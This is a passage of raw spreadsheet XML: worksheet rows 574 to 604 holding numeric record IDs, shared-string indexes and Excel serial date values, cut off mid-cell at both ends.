      </c>
      <c r="I574" s="9" t="s">
        <v>1829</v>
      </c>
      <c r="J574" s="10">
        <v>39765.603472222225</v>
      </c>
      <c r="K574" s="3" t="s">
        <v>583</v>
      </c>
      <c r="L574" s="4">
        <v>3</v>
      </c>
      <c r="M574" s="4">
        <v>1</v>
      </c>
      <c r="N574" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O574" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P574" s="3"/>
      <c r="Q574" s="3"/>
    </row>
    <row r="575" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A575" s="9">
        <v>287204</v>
      </c>
      <c r="B575" s="9" t="s">
        <v>1378</v>
      </c>
      <c r="C575" s="9" t="s">
        <v>3447</v>
      </c>
      <c r="D575" s="9" t="s">
        <v>3448</v>
      </c>
      <c r="E575" s="9">
        <v>10661</v>
      </c>
      <c r="F575" s="9" t="s">
        <v>3449</v>
      </c>
      <c r="G575" s="10">
        <v>39765.692361111112</v>
      </c>
      <c r="H575" s="9">
        <v>25705</v>
      </c>
      <c r="I575" s="9" t="s">
        <v>3450</v>
      </c>
      <c r="J575" s="10">
        <v>39765.640972222223</v>
      </c>
      <c r="K575" s="9" t="s">
        <v>1379</v>
      </c>
      <c r="L575" s="7">
        <v>3</v>
      </c>
      <c r="M575" s="7">
        <v>1</v>
      </c>
      <c r="N575" s="9" t="s">
        <v>701</v>
      </c>
      <c r="O575" s="9" t="s">
        <v>696</v>
      </c>
      <c r="Q575" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="576" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A576" s="3">
        <v>287207</v>
      </c>
      <c r="B576" s="3" t="s">
        <v>584</v>
      </c>
      <c r="C576" s="9" t="s">
        <v>3451</v>
      </c>
      <c r="D576" s="9" t="s">
        <v>3452</v>
      </c>
      <c r="E576" s="9">
        <v>1122</v>
      </c>
      <c r="F576" s="9" t="s">
        <v>3453</v>
      </c>
      <c r="G576" s="10">
        <v>40828.381249999999</v>
      </c>
      <c r="H576" s="9">
        <v>1122</v>
      </c>
      <c r="I576" s="9" t="s">
        <v>3453</v>
      </c>
      <c r="J576" s="10">
        <v>40828.380555555559</v>
      </c>
      <c r="K576" s="3" t="s">
        <v>585</v>
      </c>
      <c r="L576" s="4">
        <v>3</v>
      </c>
      <c r="M576" s="4">
        <v>1</v>
      </c>
      <c r="N576" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O576" s="3"/>
      <c r="P576" s="3"/>
      <c r="Q576" s="3"/>
    </row>
    <row r="577" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A577" s="3">
        <v>289040</v>
      </c>
      <c r="B577" s="3" t="s">
        <v>618</v>
      </c>
      <c r="C577" s="9" t="s">
        <v>3454</v>
      </c>
      <c r="D577" s="9" t="s">
        <v>3455</v>
      </c>
      <c r="E577" s="9">
        <v>17034</v>
      </c>
      <c r="F577" s="9" t="s">
        <v>2128</v>
      </c>
      <c r="G577" s="10">
        <v>41916.836111111108</v>
      </c>
      <c r="H577" s="9">
        <v>477420</v>
      </c>
      <c r="I577" s="9" t="s">
        <v>3046</v>
      </c>
      <c r="J577" s="10">
        <v>41915.650694444441</v>
      </c>
      <c r="K577" s="3" t="s">
        <v>619</v>
      </c>
      <c r="L577" s="4">
        <v>4</v>
      </c>
      <c r="M577" s="4">
        <v>2</v>
      </c>
      <c r="N577" s="3"/>
      <c r="O577" s="3"/>
      <c r="P577" s="3"/>
      <c r="Q577" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="578" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A578" s="3">
        <v>289368</v>
      </c>
      <c r="B578" s="3" t="s">
        <v>688</v>
      </c>
      <c r="C578" s="9" t="s">
        <v>3456</v>
      </c>
      <c r="D578" s="9" t="s">
        <v>3457</v>
      </c>
      <c r="E578" s="9">
        <v>1030</v>
      </c>
      <c r="F578" s="9" t="s">
        <v>3458</v>
      </c>
      <c r="G578" s="10">
        <v>41127.454861111109</v>
      </c>
      <c r="H578" s="9">
        <v>753663</v>
      </c>
      <c r="I578" s="9" t="s">
        <v>3459</v>
      </c>
      <c r="J578" s="10">
        <v>41118.751388888886</v>
      </c>
      <c r="K578" s="3" t="s">
        <v>689</v>
      </c>
      <c r="L578" s="4">
        <v>5</v>
      </c>
      <c r="M578" s="4">
        <v>3</v>
      </c>
      <c r="N578" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O578" s="3"/>
      <c r="P578" s="3"/>
      <c r="Q578" s="3"/>
    </row>
    <row r="579" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A579" s="9">
        <v>289529</v>
      </c>
      <c r="B579" s="9" t="s">
        <v>1380</v>
      </c>
      <c r="C579" s="9" t="s">
        <v>3460</v>
      </c>
      <c r="D579" s="9" t="s">
        <v>3461</v>
      </c>
      <c r="E579" s="9">
        <v>11387</v>
      </c>
      <c r="F579" s="9" t="s">
        <v>3462</v>
      </c>
      <c r="G579" s="10">
        <v>39766.379166666666</v>
      </c>
      <c r="H579" s="9">
        <v>11387</v>
      </c>
      <c r="I579" s="9" t="s">
        <v>3462</v>
      </c>
      <c r="J579" s="10">
        <v>39766.378472222219</v>
      </c>
      <c r="K579" s="9" t="s">
        <v>1381</v>
      </c>
      <c r="L579" s="7">
        <v>4</v>
      </c>
      <c r="M579" s="7">
        <v>2</v>
      </c>
      <c r="N579" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O579" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="580" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A580" s="3">
        <v>289759</v>
      </c>
      <c r="B580" s="3" t="s">
        <v>690</v>
      </c>
      <c r="C580" s="9" t="s">
        <v>3463</v>
      </c>
      <c r="D580" s="9" t="s">
        <v>3464</v>
      </c>
      <c r="E580" s="9">
        <v>11995</v>
      </c>
      <c r="F580" s="9" t="s">
        <v>3465</v>
      </c>
      <c r="G580" s="10">
        <v>40921.994444444441</v>
      </c>
      <c r="H580" s="9">
        <v>160173</v>
      </c>
      <c r="I580" s="9" t="s">
        <v>3466</v>
      </c>
      <c r="J580" s="10">
        <v>40921.786111111112</v>
      </c>
      <c r="K580" s="3" t="s">
        <v>691</v>
      </c>
      <c r="L580" s="4">
        <v>4</v>
      </c>
      <c r="M580" s="4">
        <v>2</v>
      </c>
      <c r="N580" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O580" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P580" s="3"/>
      <c r="Q580" s="3"/>
    </row>
    <row r="581" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A581" s="9">
        <v>290000</v>
      </c>
      <c r="B581" s="9" t="s">
        <v>1382</v>
      </c>
      <c r="C581" s="9" t="s">
        <v>3467</v>
      </c>
      <c r="D581" s="9" t="s">
        <v>3468</v>
      </c>
      <c r="E581" s="9">
        <v>727</v>
      </c>
      <c r="F581" s="9" t="s">
        <v>3469</v>
      </c>
      <c r="G581" s="10">
        <v>39766.567361111112</v>
      </c>
      <c r="H581" s="9">
        <v>727</v>
      </c>
      <c r="I581" s="9" t="s">
        <v>3469</v>
      </c>
      <c r="J581" s="10">
        <v>39766.540972222225</v>
      </c>
      <c r="K581" s="9" t="s">
        <v>1383</v>
      </c>
      <c r="L581" s="7">
        <v>2</v>
      </c>
      <c r="M581" s="7">
        <v>1</v>
      </c>
      <c r="Q581" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="582" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A582" s="9">
        <v>291978</v>
      </c>
      <c r="B582" s="9" t="s">
        <v>1384</v>
      </c>
      <c r="C582" s="9" t="s">
        <v>3470</v>
      </c>
      <c r="D582" s="9" t="s">
        <v>3471</v>
      </c>
      <c r="E582" s="9">
        <v>426671</v>
      </c>
      <c r="F582" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G582" s="10">
        <v>42816.68472222222</v>
      </c>
      <c r="H582" s="9">
        <v>7275984</v>
      </c>
      <c r="I582" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J582" s="10">
        <v>42815.863194444442</v>
      </c>
      <c r="K582" s="9" t="s">
        <v>1385</v>
      </c>
      <c r="L582" s="7">
        <v>5</v>
      </c>
      <c r="M582" s="7">
        <v>3</v>
      </c>
      <c r="N582" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="583" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A583" s="9">
        <v>292324</v>
      </c>
      <c r="B583" s="9" t="s">
        <v>1386</v>
      </c>
      <c r="C583" s="9" t="s">
        <v>3472</v>
      </c>
      <c r="D583" s="9" t="s">
        <v>3473</v>
      </c>
      <c r="E583" s="9">
        <v>10432</v>
      </c>
      <c r="F583" s="9" t="s">
        <v>3474</v>
      </c>
      <c r="G583" s="10">
        <v>39767.979861111111</v>
      </c>
      <c r="H583" s="9">
        <v>10432</v>
      </c>
      <c r="I583" s="9" t="s">
        <v>3474</v>
      </c>
      <c r="J583" s="10">
        <v>39767.372916666667</v>
      </c>
      <c r="K583" s="9" t="s">
        <v>1387</v>
      </c>
      <c r="L583" s="7">
        <v>2</v>
      </c>
      <c r="M583" s="7">
        <v>1</v>
      </c>
      <c r="Q583" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="584" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A584" s="9">
        <v>292357</v>
      </c>
      <c r="B584" s="9" t="s">
        <v>1388</v>
      </c>
      <c r="C584" s="9" t="s">
        <v>3475</v>
      </c>
      <c r="D584" s="9" t="s">
        <v>3476</v>
      </c>
      <c r="E584" s="9">
        <v>893</v>
      </c>
      <c r="F584" s="9" t="s">
        <v>2109</v>
      </c>
      <c r="G584" s="10">
        <v>41796.818055555559</v>
      </c>
      <c r="H584" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I584" s="9" t="s">
        <v>1603</v>
      </c>
      <c r="J584" s="10">
        <v>41783.854166666664</v>
      </c>
      <c r="K584" s="9" t="s">
        <v>1389</v>
      </c>
      <c r="L584" s="7">
        <v>9</v>
      </c>
      <c r="M584" s="7">
        <v>7</v>
      </c>
      <c r="N584" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="585" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A585" s="9">
        <v>295169</v>
      </c>
      <c r="B585" s="9" t="s">
        <v>1390</v>
      </c>
      <c r="C585" s="9" t="s">
        <v>3477</v>
      </c>
      <c r="D585" s="9" t="s">
        <v>3478</v>
      </c>
      <c r="E585" s="9">
        <v>25093</v>
      </c>
      <c r="F585" s="9" t="s">
        <v>3274</v>
      </c>
      <c r="G585" s="10">
        <v>39769.40625</v>
      </c>
      <c r="H585" s="9">
        <v>25093</v>
      </c>
      <c r="I585" s="9" t="s">
        <v>3274</v>
      </c>
      <c r="J585" s="10">
        <v>39769.395833333336</v>
      </c>
      <c r="K585" s="9" t="s">
        <v>1391</v>
      </c>
      <c r="L585" s="7">
        <v>3</v>
      </c>
      <c r="M585" s="7">
        <v>1</v>
      </c>
      <c r="N585" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O585" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="586" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A586" s="13">
        <v>295339</v>
      </c>
      <c r="B586" s="13" t="s">
        <v>1392</v>
      </c>
      <c r="C586" s="9" t="s">
        <v>3479</v>
      </c>
      <c r="D586" s="9" t="s">
        <v>3479</v>
      </c>
      <c r="E586" s="9">
        <v>25462</v>
      </c>
      <c r="F586" s="9" t="s">
        <v>3480</v>
      </c>
      <c r="G586" s="10">
        <v>39769.480555555558</v>
      </c>
      <c r="H586" s="9">
        <v>5744</v>
      </c>
      <c r="I586" s="9" t="s">
        <v>2227</v>
      </c>
      <c r="J586" s="10">
        <v>39769.46875</v>
      </c>
      <c r="K586" s="13" t="s">
        <v>1393</v>
      </c>
      <c r="L586" s="7">
        <v>3</v>
      </c>
      <c r="M586" s="7">
        <v>1</v>
      </c>
      <c r="N586" s="13" t="s">
        <v>696</v>
      </c>
      <c r="O586" s="13"/>
      <c r="P586" s="13"/>
      <c r="Q586" s="13"/>
    </row>
    <row r="587" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A587" s="9">
        <v>296133</v>
      </c>
      <c r="B587" s="9" t="s">
        <v>1394</v>
      </c>
      <c r="C587" s="9" t="s">
        <v>3481</v>
      </c>
      <c r="D587" s="9" t="s">
        <v>3482</v>
      </c>
      <c r="E587" s="9">
        <v>2648</v>
      </c>
      <c r="F587" s="9" t="s">
        <v>3483</v>
      </c>
      <c r="G587" s="10">
        <v>39769.714583333334</v>
      </c>
      <c r="H587" s="9">
        <v>8709</v>
      </c>
      <c r="I587" s="9" t="s">
        <v>3484</v>
      </c>
      <c r="J587" s="10">
        <v>39769.706944444442</v>
      </c>
      <c r="K587" s="9" t="s">
        <v>1395</v>
      </c>
      <c r="L587" s="7">
        <v>4</v>
      </c>
      <c r="M587" s="7">
        <v>1</v>
      </c>
      <c r="N587" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="588" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A588" s="9">
        <v>296193</v>
      </c>
      <c r="B588" s="9" t="s">
        <v>1396</v>
      </c>
      <c r="C588" s="9" t="s">
        <v>3485</v>
      </c>
      <c r="D588" s="9" t="s">
        <v>3486</v>
      </c>
      <c r="E588" s="9">
        <v>419</v>
      </c>
      <c r="F588" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G588" s="10">
        <v>39882.447916666664</v>
      </c>
      <c r="H588" s="9">
        <v>5640</v>
      </c>
      <c r="I588" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J588" s="10">
        <v>39882.163194444445</v>
      </c>
      <c r="K588" s="9" t="s">
        <v>1397</v>
      </c>
      <c r="L588" s="7">
        <v>5</v>
      </c>
      <c r="M588" s="7">
        <v>3</v>
      </c>
      <c r="Q588" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="589" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A589" s="9">
        <v>297134</v>
      </c>
      <c r="B589" s="9" t="s">
        <v>1398</v>
      </c>
      <c r="C589" s="9" t="s">
        <v>3487</v>
      </c>
      <c r="D589" s="9" t="s">
        <v>3488</v>
      </c>
      <c r="E589" s="9">
        <v>4893</v>
      </c>
      <c r="F589" s="9" t="s">
        <v>3321</v>
      </c>
      <c r="G589" s="10">
        <v>39769.943055555559</v>
      </c>
      <c r="H589" s="9">
        <v>4337</v>
      </c>
      <c r="I589" s="9" t="s">
        <v>3489</v>
      </c>
      <c r="J589" s="10">
        <v>39769.939583333333</v>
      </c>
      <c r="K589" s="9" t="s">
        <v>1399</v>
      </c>
      <c r="L589" s="7">
        <v>5</v>
      </c>
      <c r="M589" s="7">
        <v>3</v>
      </c>
      <c r="N589" s="9" t="s">
        <v>698</v>
      </c>
      <c r="O589" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="590" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A590" s="9">
        <v>299588</v>
      </c>
      <c r="B590" s="9" t="s">
        <v>1400</v>
      </c>
      <c r="C590" s="9" t="s">
        <v>3490</v>
      </c>
      <c r="D590" s="9" t="s">
        <v>3491</v>
      </c>
      <c r="E590" s="9">
        <v>1694</v>
      </c>
      <c r="F590" s="9" t="s">
        <v>3492</v>
      </c>
      <c r="G590" s="10">
        <v>39771.904166666667</v>
      </c>
      <c r="H590" s="9">
        <v>1694</v>
      </c>
      <c r="I590" s="9" t="s">
        <v>3492</v>
      </c>
      <c r="J590" s="10">
        <v>39771.90347222222</v>
      </c>
      <c r="K590" s="9" t="s">
        <v>1401</v>
      </c>
      <c r="L590" s="7">
        <v>3</v>
      </c>
      <c r="M590" s="7">
        <v>1</v>
      </c>
      <c r="Q590" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="591" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A591" s="9">
        <v>301546</v>
      </c>
      <c r="B591" s="9" t="s">
        <v>1402</v>
      </c>
      <c r="C591" s="9" t="s">
        <v>3493</v>
      </c>
      <c r="D591" s="9" t="s">
        <v>3494</v>
      </c>
      <c r="E591" s="9">
        <v>1626878</v>
      </c>
      <c r="F591" s="9" t="s">
        <v>3495</v>
      </c>
      <c r="G591" s="10">
        <v>41709.420138888891</v>
      </c>
      <c r="H591" s="9">
        <v>193655</v>
      </c>
      <c r="I591" s="9" t="s">
        <v>3496</v>
      </c>
      <c r="J591" s="10">
        <v>41709.418749999997</v>
      </c>
      <c r="K591" s="9" t="s">
        <v>1403</v>
      </c>
      <c r="L591" s="7">
        <v>7</v>
      </c>
      <c r="M591" s="7">
        <v>5</v>
      </c>
      <c r="N591" s="9" t="s">
        <v>706</v>
      </c>
      <c r="O591" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="592" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A592" s="9">
        <v>301924</v>
      </c>
      <c r="B592" s="9" t="s">
        <v>1404</v>
      </c>
      <c r="C592" s="9" t="s">
        <v>3497</v>
      </c>
      <c r="D592" s="9" t="s">
        <v>3498</v>
      </c>
      <c r="E592" s="9">
        <v>1694</v>
      </c>
      <c r="F592" s="9" t="s">
        <v>3492</v>
      </c>
      <c r="G592" s="10">
        <v>39772.597916666666</v>
      </c>
      <c r="H592" s="9">
        <v>18673</v>
      </c>
      <c r="I592" s="9" t="s">
        <v>3499</v>
      </c>
      <c r="J592" s="10">
        <v>39771.609027777777</v>
      </c>
      <c r="K592" s="9" t="s">
        <v>1405</v>
      </c>
      <c r="L592" s="7">
        <v>4</v>
      </c>
      <c r="M592" s="7">
        <v>2</v>
      </c>
      <c r="N592" s="9" t="s">
        <v>703</v>
      </c>
      <c r="Q592" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="593" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A593" s="9">
        <v>302918</v>
      </c>
      <c r="B593" s="9" t="s">
        <v>1406</v>
      </c>
      <c r="C593" s="9" t="s">
        <v>3500</v>
      </c>
      <c r="D593" s="9" t="s">
        <v>3501</v>
      </c>
      <c r="E593" s="9">
        <v>3194</v>
      </c>
      <c r="F593" s="9" t="s">
        <v>3502</v>
      </c>
      <c r="G593" s="10">
        <v>39771.897916666669</v>
      </c>
      <c r="H593" s="9">
        <v>3194</v>
      </c>
      <c r="I593" s="9" t="s">
        <v>3502</v>
      </c>
      <c r="J593" s="10">
        <v>39771.822222222225</v>
      </c>
      <c r="K593" s="9" t="s">
        <v>1407</v>
      </c>
      <c r="L593" s="7">
        <v>3</v>
      </c>
      <c r="M593" s="7">
        <v>1</v>
      </c>
      <c r="N593" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="594" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A594" s="9">
        <v>304109</v>
      </c>
      <c r="B594" s="9" t="s">
        <v>1408</v>
      </c>
      <c r="C594" s="9" t="s">
        <v>3503</v>
      </c>
      <c r="D594" s="9" t="s">
        <v>3504</v>
      </c>
      <c r="E594" s="9">
        <v>2915</v>
      </c>
      <c r="F594" s="9" t="s">
        <v>2740</v>
      </c>
      <c r="G594" s="10">
        <v>39772.091666666667</v>
      </c>
      <c r="H594" s="9">
        <v>2915</v>
      </c>
      <c r="I594" s="9" t="s">
        <v>2740</v>
      </c>
      <c r="J594" s="10">
        <v>39772.088194444441</v>
      </c>
      <c r="K594" s="9" t="s">
        <v>1409</v>
      </c>
      <c r="L594" s="7">
        <v>3</v>
      </c>
      <c r="M594" s="7">
        <v>1</v>
      </c>
      <c r="Q594" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="595" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A595" s="9">
        <v>305177</v>
      </c>
      <c r="B595" s="12" t="s">
        <v>1410</v>
      </c>
      <c r="C595" s="9" t="s">
        <v>3505</v>
      </c>
      <c r="D595" s="9" t="s">
        <v>3506</v>
      </c>
      <c r="E595" s="9">
        <v>1246613</v>
      </c>
      <c r="F595" s="9" t="s">
        <v>3507</v>
      </c>
      <c r="G595" s="10">
        <v>39772.543749999997</v>
      </c>
      <c r="H595" s="9">
        <v>20074</v>
      </c>
      <c r="I595" s="9" t="s">
        <v>3508</v>
      </c>
      <c r="J595" s="10">
        <v>39772.534722222219</v>
      </c>
      <c r="K595" s="9" t="s">
        <v>1411</v>
      </c>
      <c r="L595" s="7">
        <v>3</v>
      </c>
      <c r="M595" s="7">
        <v>1</v>
      </c>
      <c r="N595" s="9" t="s">
        <v>704</v>
      </c>
      <c r="Q595" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="596" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A596" s="9">
        <v>307294</v>
      </c>
      <c r="B596" s="9" t="s">
        <v>1412</v>
      </c>
      <c r="C596" s="9" t="s">
        <v>3509</v>
      </c>
      <c r="D596" s="9" t="s">
        <v>3510</v>
      </c>
      <c r="E596" s="9">
        <v>1057</v>
      </c>
      <c r="F596" s="9" t="s">
        <v>3511</v>
      </c>
      <c r="G596" s="10">
        <v>39773.049305555556</v>
      </c>
      <c r="H596" s="9">
        <v>39474</v>
      </c>
      <c r="I596" s="9" t="s">
        <v>3512</v>
      </c>
      <c r="J596" s="10">
        <v>39772.991666666669</v>
      </c>
      <c r="K596" s="9" t="s">
        <v>1413</v>
      </c>
      <c r="L596" s="7">
        <v>4</v>
      </c>
      <c r="M596" s="7">
        <v>2</v>
      </c>
      <c r="N596" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="597" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A597" s="9">
        <v>309638</v>
      </c>
      <c r="B597" s="9" t="s">
        <v>1414</v>
      </c>
      <c r="C597" s="9" t="s">
        <v>3513</v>
      </c>
      <c r="D597" s="9" t="s">
        <v>3514</v>
      </c>
      <c r="E597" s="9">
        <v>25222</v>
      </c>
      <c r="F597" s="9" t="s">
        <v>797</v>
      </c>
      <c r="G597" s="10">
        <v>39773.755555555559</v>
      </c>
      <c r="H597" s="9">
        <v>13913</v>
      </c>
      <c r="I597" s="9" t="s">
        <v>2821</v>
      </c>
      <c r="J597" s="10">
        <v>39773.754861111112</v>
      </c>
      <c r="K597" s="9" t="s">
        <v>1415</v>
      </c>
      <c r="L597" s="7">
        <v>4</v>
      </c>
      <c r="M597" s="7">
        <v>2</v>
      </c>
      <c r="N597" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="598" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A598" s="9">
        <v>311430</v>
      </c>
      <c r="B598" s="9" t="s">
        <v>1416</v>
      </c>
      <c r="C598" s="9" t="s">
        <v>3515</v>
      </c>
      <c r="D598" s="9" t="s">
        <v>3516</v>
      </c>
      <c r="E598" s="9">
        <v>745</v>
      </c>
      <c r="F598" s="9" t="s">
        <v>3517</v>
      </c>
      <c r="G598" s="10">
        <v>39774.728472222225</v>
      </c>
      <c r="H598" s="9">
        <v>745</v>
      </c>
      <c r="I598" s="9" t="s">
        <v>3517</v>
      </c>
      <c r="J598" s="10">
        <v>39774.724999999999</v>
      </c>
      <c r="K598" s="9" t="s">
        <v>1417</v>
      </c>
      <c r="L598" s="7">
        <v>6</v>
      </c>
      <c r="M598" s="7">
        <v>4</v>
      </c>
      <c r="N598" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O598" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="599" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A599" s="9">
        <v>312443</v>
      </c>
      <c r="B599" s="12" t="s">
        <v>1418</v>
      </c>
      <c r="C599" s="9" t="s">
        <v>3518</v>
      </c>
      <c r="D599" s="9" t="s">
        <v>3519</v>
      </c>
      <c r="E599" s="9">
        <v>426671</v>
      </c>
      <c r="F599" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G599" s="10">
        <v>42816.677777777775</v>
      </c>
      <c r="H599" s="9">
        <v>7275984</v>
      </c>
      <c r="I599" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J599" s="10">
        <v>42815.839583333334</v>
      </c>
      <c r="K599" s="9" t="s">
        <v>1419</v>
      </c>
      <c r="L599" s="7">
        <v>7</v>
      </c>
      <c r="M599" s="7">
        <v>5</v>
      </c>
      <c r="N599" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="600" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A600" s="9">
        <v>313111</v>
      </c>
      <c r="B600" s="9" t="s">
        <v>1420</v>
      </c>
      <c r="C600" s="9" t="s">
        <v>3520</v>
      </c>
      <c r="D600" s="9" t="s">
        <v>3521</v>
      </c>
      <c r="E600" s="9">
        <v>25222</v>
      </c>
      <c r="F600" s="9" t="s">
        <v>797</v>
      </c>
      <c r="G600" s="10">
        <v>39775.991666666669</v>
      </c>
      <c r="H600" s="9">
        <v>4279</v>
      </c>
      <c r="I600" s="9" t="s">
        <v>1805</v>
      </c>
      <c r="J600" s="10">
        <v>39775.981249999997</v>
      </c>
      <c r="K600" s="9" t="s">
        <v>1421</v>
      </c>
      <c r="L600" s="7">
        <v>4</v>
      </c>
      <c r="M600" s="7">
        <v>2</v>
      </c>
      <c r="N600" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="601" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A601" s="9">
        <v>313746</v>
      </c>
      <c r="B601" s="9" t="s">
        <v>1422</v>
      </c>
      <c r="C601" s="9" t="s">
        <v>3522</v>
      </c>
      <c r="D601" s="9" t="s">
        <v>3523</v>
      </c>
      <c r="E601" s="9">
        <v>2766176</v>
      </c>
      <c r="F601" s="9" t="s">
        <v>3524</v>
      </c>
      <c r="G601" s="10">
        <v>39776.419444444444</v>
      </c>
      <c r="H601" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I601" s="9" t="s">
        <v>3525</v>
      </c>
      <c r="J601" s="10">
        <v>39776.396527777775</v>
      </c>
      <c r="K601" s="9" t="s">
        <v>1423</v>
      </c>
      <c r="L601" s="7">
        <v>2</v>
      </c>
      <c r="M601" s="7">
        <v>1</v>
      </c>
      <c r="N601" s="9" t="s">
        <v>697</v>
      </c>
      <c r="O601" s="9" t="s">
        <v>699</v>
      </c>
      <c r="P601" s="9" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="602" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A602" s="9">
        <v>315590</v>
      </c>
      <c r="B602" s="9" t="s">
        <v>1424</v>
      </c>
      <c r="C602" s="9" t="s">
        <v>3526</v>
      </c>
      <c r="D602" s="9" t="s">
        <v>3527</v>
      </c>
      <c r="E602" s="9">
        <v>40399</v>
      </c>
      <c r="F602" s="9" t="s">
        <v>3528</v>
      </c>
      <c r="G602" s="10">
        <v>40288.749305555553</v>
      </c>
      <c r="H602" s="9">
        <v>7116</v>
      </c>
      <c r="I602" s="9" t="s">
        <v>3529</v>
      </c>
      <c r="J602" s="10">
        <v>39819.896527777775</v>
      </c>
      <c r="K602" s="9" t="s">
        <v>1425</v>
      </c>
      <c r="L602" s="7">
        <v>4</v>
      </c>
      <c r="M602" s="7">
        <v>1</v>
      </c>
      <c r="N602" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O602" s="9" t="s">
        <v>704</v>
      </c>
      <c r="P602" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q602" s="9" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="603" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A603" s="3">
        <v>315684</v>
      </c>
      <c r="B603" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C603" s="9" t="s">
        <v>3530</v>
      </c>
      <c r="D603" s="9" t="s">
        <v>3531</v>
      </c>
      <c r="E603" s="9">
        <v>437</v>
      </c>
      <c r="F603" s="9" t="s">
        <v>3532</v>
      </c>
      <c r="G603" s="10">
        <v>39776.92291666667</v>
      </c>
      <c r="H603" s="9">
        <v>437</v>
      </c>
      <c r="I603" s="9" t="s">
        <v>3532</v>
      </c>
      <c r="J603" s="10">
        <v>39776.92291666667</v>
      </c>
      <c r="K603" s="3" t="s">
        <v>64</v>
      </c>
      <c r="L603" s="4">
        <v>3</v>
      </c>
      <c r="M603" s="4">
        <v>1</v>
      </c>
      <c r="N603" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O603" s="3"/>
      <c r="P603" s="3"/>
      <c r="Q603" s="3"/>
    </row>
    <row r="604" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A604" s="9">
        <v>315911</v>
      </c>
      <c r="B604" s="9" t="s">
        <v>1426</v>
      </c>
      <c r="C604" s="9" t="s">
        <v>3533</v>
      </c>
      <c r="D604" s="9" t="s">
        <v>3534</v>
      </c>
      <c r="E604" s="9">
        <v>202392</v>
      </c>
      <c r="F604" s="9" t="s">
        <v>3535</v>
      </c>
      <c r="G604" s="10">
        <v>40322.081944444442</v>
      </c>
      <c r="H604" s="9">
        <v>202392</v>
      </c>
      <c r="I604" s="9" t="s">
        <v>3535</v>
      </c>
      <c r="J604" s="10">
        <v>40322.081250000003</v>
      </c>
      <c r="K604" s="9" t="s">
        <v>1427</v>
      </c>
      <c r="L604" s="7">
        <v>25</v>
      </c>
      <c r="M604" s="7">
        <v>22</v>
      </c>
      <c r="N604" s="9" t="s">
